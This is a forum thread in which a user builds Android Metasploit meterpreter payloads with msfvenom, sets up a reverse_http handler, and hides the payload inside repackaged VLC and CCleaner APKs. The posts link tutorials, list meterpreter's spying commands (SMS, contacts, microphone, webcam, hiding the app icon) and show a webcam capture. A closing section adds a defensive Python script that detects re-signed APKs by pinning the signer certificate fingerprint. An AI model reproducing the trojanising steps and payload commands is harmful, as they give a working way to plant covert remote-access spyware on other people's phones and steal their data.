niceflower Tux's lil' helper
Joined: 31 Mar 2017 Posts: 76
Posted: Mon Jun 26, 2017 6:38 pm    Post subject: [SOLVED] android metasploit
Hello, I have a question about a piece of software crafted with the Metasploit framework.
It runs fine; the only downside is that when the Android phone goes idle, the meterpreter seems to die, and the only way to restart it is by launching the payload icon on the Android phone again.
For a free payload it does include cool features; however, I cannot seem to get the meterpreter consistent.
Any ideas?
msfconsole:
The payload is called: msfvenom -p android/meterpreter/reverse_tcp LHOST= ip LPORT = 444 r > name.apk
The payload is set with:
Code:
set PAYLOAD android/meterpreter/reverse_tcp
It would be nice to have a consistent connection to my phone so I can track it if it gets stolen, using Google Maps.
I know little about who made this payload for the Metasploit framework, or whether anyone else knows something about it.
*edit* The only way I can seem to start the meterpreter is by pressing the icon on the phone.
The solution would be to make the .apk auto-run each time after idle, or even better make it auto-run 24/7.
I just checked the same payload on my Galaxy Tab 3, and there the meterpreter stays consistent even when idle,
so the problem is related to my Huawei P8 phone.
Last edited by niceflower on Tue Jun 27, 2017 12:29 am; edited 1 time in total

niceflower
Posted: Tue Jun 27, 2017 12:11 am
OK, I found it. On the Huawei P8, instead of creating tcp:
Code:
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=4444 -o name.apk
*To make the payload work outside the LAN, for example on a 4G mobile network, just use LHOST=your external public IP, and then to start the meterpreter set LHOST=your internal box's IP.
I used http:
Code:
msfvenom -p android/meterpreter/reverse_http LHOST=ip LPORT=4444 -o name.apk
Then to start msfconsole:
Code:
msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_http
set LHOST (put ip here)
set LPORT 4444
exploit
?
When closing down Metasploit and restarting, there is actually no interaction needed with the Android device to start a new meterpreter shell.
The only downside for now is that the reverse_http payload cannot take webcam snap, stream, wlan_geolocate and some other features when the telephone is idle;
however, this is not a real concern for me at this moment.
*last edit*
I just noticed a wakelock option, so everything is working while idle too now, with the reverse_http payload on port 4444.
Sorry for being a bit Gentoo off-topic.

niceflower
Posted: Wed Jun 28, 2017 6:13 pm
Hello!
I explored my Android Metasploit project, and noticed that it was possible to build the PAYLOAD into VLC.apk (VideoLAN) and ccleaner.apk (a tool to clean up a phone).
These websites can be very useful on how to embed the compromised .apk into any existing .apk:
https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/
https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-0166901/
I can say it works, and VLC is running on my Huawei P8 now. These are some commands from the meterpreter shell on my Kali Rolling Live:
The wakelock command is a bit bugged, and keeping the meterpreter consistent is an art.
I have tried to look into creating a service in the vlc.apk with Android Studio on Linux; I am stuck on how to create the service hook at this point, to let it run 24/7.
The problem still seems to be that the meterpreter shell dies over time.
*edit*
This proves how important it is to keep "do not allow apps from untrusted sources" turned on in Android, because any .apk from an untrusted source can be manipulated.
Code:
meterpreter > ?

Stdapi: File system Commands
============================

    Command           Description
    -------           -----------
    cat               Read the contents of a file to the screen
    cd                Change directory
    checksum          Retrieve the checksum of a file
    cp                Copy source to destination
    dir               List files (alias for ls)
    download          Download a file or directory
    edit              Edit a file
    getlwd            Print local working directory
    getwd             Print working directory
    lcd               Change local working directory
    lpwd              Print local working directory
    ls                List files
    mkdir             Make directory
    mv                Move source to destination
    pwd               Print working directory
    rm                Delete the specified file
    rmdir             Remove directory
    search            Search for files
    upload            Upload a file or directory

Stdapi: Networking Commands
===========================

    Command           Description
    -------           -----------
    ifconfig          Display interfaces
    ipconfig          Display interfaces
    portfwd           Forward a local port to a remote service
    route             View and modify the routing table

Stdapi: System Commands
=======================

    Command           Description
    -------           -----------
    execute           Execute a command
    getuid            Get the user that the server is running as
    localtime         Displays the target system's local date and time
    pgrep             Filter processes by name
    ps                List running processes
    shell             Drop into a system command shell
    sysinfo           Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================

    Command           Description
    -------           -----------
    record_mic        Record audio from the default microphone for X seconds
    webcam_chat       Start a video chat
    webcam_list       List webcams
    webcam_snap       Take a snapshot from the specified webcam
    webcam_stream     Play a video stream from the specified webcam

Android Commands
================

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    hide_app_icon     Hide the app icon from the launcher
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wakelock          Enable/Disable Wakelock
    wlan_geolocate    Get current lat-long using WLAN information

meterpreter > webcam_snap
[-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/OuZRSbmh.jpeg
meterpreter >
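The last post's closing point (a VLC or CCleaner package with something extra built in looks like the original to the user) is exactly why Android ties an app's identity to its signing certificate: whoever modifies and re-signs an APK cannot reproduce the vendor's key, so the signer fingerprint changes. The following Python script is an added example written for this thread; it is not code from the poster, from Metasploit, or from the linked tutorials. It pins the expected signer fingerprint (the SHA-256 of the DER certificate, the same value `keytool -printcert` shows) and flags an APK whose META-INF signature file carries a different certificate or none at all. The APK, the certificates and the PKCS#7 wrapper are all constructed in-line as placeholder DER blobs, since a real X.509 certificate is not needed to show the check. It reads only the JAR (v1) signature files in META-INF, not the v2/v3 APK Signing Block, and it does not verify the signature itself, only who signed.

```python
"""Pin the signing certificate of an APK and flag repackaged or unsigned builds (added example)."""
import hashlib
import io
import zipfile

SIGNED_DATA_OID = bytes.fromhex("2a864886f70d010702")  # 1.2.840.113549.1.7.2 (PKCS#7 signedData)
DATA_OID = bytes.fromhex("2a864886f70d010701")         # 1.2.840.113549.1.7.1 (PKCS#7 data)


def der_encode(tag, content):
    """Encode one DER TLV with short- or long-form length (used only to build the constructed sample)."""
    if len(content) < 0x80:
        length = bytes([len(content)])
    else:
        n = len(content).to_bytes((len(content).bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(n)]) + n
    return bytes([tag]) + length + content


def der_walk(data):
    """Yield (tag, value, raw_tlv) for each top-level TLV in data; single-byte tags only."""
    pos = 0
    while pos + 1 < len(data):
        tag, first = data[pos], data[pos + 1]
        if first < 0x80:
            length, hdr = first, 2
        else:
            n = first & 0x7F
            length, hdr = int.from_bytes(data[pos + 2:pos + 2 + n], "big"), 2 + n
        end = pos + hdr + length
        yield tag, data[pos + hdr:end], data[pos:end]
        pos = end


def signer_certs_from_pkcs7(blob):
    """Return the DER certificates carried in a PKCS#7 SignedData (the META-INF/*.RSA file)."""
    outer = list(der_walk(blob))
    if not outer or outer[0][0] != 0x30:
        return []
    fields = list(der_walk(outer[0][1]))  # ContentInfo: OID, then [0] EXPLICIT SignedData
    if len(fields) < 2 or fields[0][1] != SIGNED_DATA_OID or fields[1][0] != 0xA0:
        return []
    inner = list(der_walk(fields[1][1]))
    if not inner or inner[0][0] != 0x30:
        return []
    for tag, value, _ in der_walk(inner[0][1]):
        if tag == 0xA0:  # certificates [0] IMPLICIT SET OF Certificate
            return [raw for t, _, raw in der_walk(value) if t == 0x30]
    return []


def cert_fingerprint(cert_der):
    """SHA-256 over the DER certificate, in the colon-separated form keytool prints."""
    return ":".join(f"{b:02X}" for b in hashlib.sha256(cert_der).digest())


def check_apk_signer(apk_bytes, pinned_fingerprints):
    """Return (verdict, fingerprints); verdict is 'ok', 'unsigned' or 'unknown_signer'."""
    fps = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for name in zf.namelist():
            upper = name.upper()
            if upper.startswith("META-INF/") and upper.endswith((".RSA", ".DSA", ".EC")):
                fps.extend(cert_fingerprint(c) for c in signer_certs_from_pkcs7(zf.read(name)))
    if not fps:
        return "unsigned", fps
    if any(fp not in pinned_fingerprints for fp in fps):
        return "unknown_signer", fps
    return "ok", fps


def build_sample_apk(cert_der=None):
    """Constructed test APK: a zip with a placeholder classes.dex and, optionally, a CERT.RSA."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("classes.dex", b"dex\n035\x00placeholder")
        if cert_der is not None:
            signed_data = der_encode(0x30,
                der_encode(0x02, b"\x01")                        # version
                + der_encode(0x31, b"")                          # digestAlgorithms (empty)
                + der_encode(0x30, der_encode(0x06, DATA_OID))   # encapContentInfo
                + der_encode(0xA0, cert_der)                     # certificates [0]
                + der_encode(0x31, b""))                         # signerInfos (empty)
            pkcs7 = der_encode(0x30, der_encode(0x06, SIGNED_DATA_OID) + der_encode(0xA0, signed_data))
            zf.writestr("META-INF/CERT.RSA", pkcs7)
    return buf.getvalue()


# Constructed stand-ins for the vendor's release certificate and a re-signing key
# (real certificates are X.509 SEQUENCEs as well; only their contents differ).
VENDOR_CERT = der_encode(0x30, b"vendor-release-certificate-placeholder")
REPACK_CERT = der_encode(0x30, b"rebuild-test-key-certificate-placeholder")
PINNED = {cert_fingerprint(VENDOR_CERT)}

if __name__ == "__main__":
    for label, apk in (("original", build_sample_apk(VENDOR_CERT)),
                       ("re-signed", build_sample_apk(REPACK_CERT)),
                       ("no signature", build_sample_apk(None))):
        print(f"{label:13s} -> {check_apk_signer(apk, PINNED)[0]}")
```

In practice the pinned value comes from a known-good copy of the app (`keytool -printcert -jarfile app.apk`), and the check is run on anything sideloaded onto a fleet device; Android itself applies the same rule at update time, which is why a re-signed build can never install over the genuine one and has to be installed from an untrusted source instead.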